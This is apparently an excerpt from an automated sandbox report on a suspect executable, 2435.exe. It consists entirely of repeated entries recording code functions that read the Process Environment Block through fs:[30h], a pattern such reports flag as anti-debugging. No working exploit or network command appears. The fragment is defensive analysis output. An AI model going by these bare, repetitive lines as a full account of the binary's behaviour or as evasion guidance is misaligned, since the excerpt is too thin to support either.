Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B0B8D0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_00B0B8D0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B0B8D0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B0B8D0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B0B8D0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B0B8D0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]	1_2_00A8B02A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]	1_2_00A8B02A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]	1_2_00A8B02A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]	1_2_00A8B02A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]	1_2_00AA002D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]	1_2_00AA002D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]	1_2_00AA002D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]	1_2_00AA002D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]	1_2_00AA002D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A830 mov eax, dword ptr fs:[00000030h]	1_2_00A9A830
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A830 mov eax, dword ptr fs:[00000030h]	1_2_00A9A830
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A830 mov eax, dword ptr fs:[00000030h]	1_2_00A9A830
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A830 mov eax, dword ptr fs:[00000030h]	1_2_00A9A830
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]	1_2_00B44015
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]	1_2_00B44015
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]	1_2_00AF7016
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]	1_2_00AF7016
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]	1_2_00AF7016
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B32073 mov eax, dword ptr fs:[00000030h]	1_2_00B32073
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B41074 mov eax, dword ptr fs:[00000030h]	1_2_00B41074
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]	1_2_00A90050
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]	1_2_00A90050
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF69A6 mov eax, dword ptr fs:[00000030h]	1_2_00AF69A6
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]	1_2_00AA61A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]	1_2_00AA61A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]	1_2_00AF51BE
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]	1_2_00AF51BE
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]	1_2_00AF51BE
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]	1_2_00AF51BE
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov eax, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov eax, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov eax, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF mov eax, dword ptr fs:[00000030h]	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]	1_2_00B349A4
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]	1_2_00B349A4
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]	1_2_00B349A4
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]	1_2_00B349A4
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9C182 mov eax, dword ptr fs:[00000030h]	1_2_00A9C182
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAA185 mov eax, dword ptr fs:[00000030h]	1_2_00AAA185
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA2990 mov eax, dword ptr fs:[00000030h]	1_2_00AA2990
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00A7B1E1
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00A7B1E1
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00A7B1E1
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B041E8 mov eax, dword ptr fs:[00000030h]	1_2_00B041E8
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]	1_2_00A94120
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]	1_2_00A94120
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]	1_2_00A94120
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]	1_2_00A94120
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A94120 mov ecx, dword ptr fs:[00000030h]	1_2_00A94120
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]	1_2_00AA513A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]	1_2_00AA513A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]	1_2_00A79100
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]	1_2_00A79100
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]	1_2_00A79100
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7C962 mov eax, dword ptr fs:[00000030h]	1_2_00A7C962
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]	1_2_00A7B171
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]	1_2_00A7B171
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]	1_2_00A9B944
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]	1_2_00A9B944
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]	1_2_00A752A5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]	1_2_00A752A5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]	1_2_00A752A5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]	1_2_00A752A5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]	1_2_00A752A5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]	1_2_00A8AAB0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]	1_2_00A8AAB0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAFAB0 mov eax, dword ptr fs:[00000030h]	1_2_00AAFAB0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]	1_2_00AAD294
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]	1_2_00AAD294
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA2AE4 mov eax, dword ptr fs:[00000030h]	1_2_00AA2AE4
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h]	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA2ACB mov eax, dword ptr fs:[00000030h]	1_2_00AA2ACB
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]	1_2_00A9A229
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]	1_2_00A9A229
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]	1_2_00A9A229
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]	1_2_00A9A229
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]	1_2_00A9A229
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]	1_2_00A9A229
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]	1_2_00A9A229
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]	1_2_00A9A229
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h]	1_2_00A9A229
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]	1_2_00AB4A2C
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]	1_2_00AB4A2C
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A88A0A mov eax, dword ptr fs:[00000030h]	1_2_00A88A0A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]	1_2_00B3AA16
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]	1_2_00B3AA16
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]	1_2_00A7AA16
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]	1_2_00A7AA16
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A93A1C mov eax, dword ptr fs:[00000030h]	1_2_00A93A1C
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]	1_2_00A75210
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A75210 mov ecx, dword ptr fs:[00000030h]	1_2_00A75210
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]	1_2_00A75210
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]	1_2_00A75210
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB927A mov eax, dword ptr fs:[00000030h]	1_2_00AB927A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]	1_2_00B2B260
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]	1_2_00B2B260
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B48A62 mov eax, dword ptr fs:[00000030h]	1_2_00B48A62
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3EA55 mov eax, dword ptr fs:[00000030h]	1_2_00B3EA55
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]	1_2_00A79240
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]	1_2_00A79240
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]	1_2_00A79240
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]	1_2_00A79240
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B04257 mov eax, dword ptr fs:[00000030h]	1_2_00B04257
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]	1_2_00AA4BAD
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]	1_2_00AA4BAD
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]	1_2_00AA4BAD
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B45BA5 mov eax, dword ptr fs:[00000030h]	1_2_00B45BA5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]	1_2_00A81B8F
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]	1_2_00A81B8F
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B2D380 mov ecx, dword ptr fs:[00000030h]	1_2_00B2D380
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3138A mov eax, dword ptr fs:[00000030h]	1_2_00B3138A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAB390 mov eax, dword ptr fs:[00000030h]	1_2_00AAB390
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA2397 mov eax, dword ptr fs:[00000030h]	1_2_00AA2397
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9DBE9 mov eax, dword ptr fs:[00000030h]	1_2_00A9DBE9
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AA03E2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AA03E2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AA03E2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AA03E2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AA03E2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AA03E2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B223E3 mov ecx, dword ptr fs:[00000030h]	1_2_00B223E3
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B223E3 mov ecx, dword ptr fs:[00000030h]	1_2_00B223E3
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B223E3 mov eax, dword ptr fs:[00000030h]	1_2_00B223E3
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]	1_2_00AF53CA
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]	1_2_00AF53CA
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h]	1_2_00A9A309
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3131B mov eax, dword ptr fs:[00000030h]	1_2_00B3131B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]	1_2_00A7DB60
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]	1_2_00AA3B7A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]	1_2_00AA3B7A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7DB40 mov eax, dword ptr fs:[00000030h]	1_2_00A7DB40
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B48B58 mov eax, dword ptr fs:[00000030h]	1_2_00B48B58
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7F358 mov eax, dword ptr fs:[00000030h]	1_2_00A7F358
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h]	1_2_00B34496
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8849B mov eax, dword ptr fs:[00000030h]	1_2_00A8849B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B314FB mov eax, dword ptr fs:[00000030h]	1_2_00B314FB
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]	1_2_00AF6CF0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]	1_2_00AF6CF0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]	1_2_00AF6CF0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B48CD6 mov eax, dword ptr fs:[00000030h]	1_2_00B48CD6
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AABC2C mov eax, dword ptr fs:[00000030h]	1_2_00AABC2C
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]	1_2_00AF6C0A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]	1_2_00AF6C0A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]	1_2_00AF6C0A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]	1_2_00AF6C0A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]	1_2_00B31C06
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]	1_2_00B4740D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]	1_2_00B4740D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]	1_2_00B4740D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9746D mov eax, dword ptr fs:[00000030h]	1_2_00A9746D
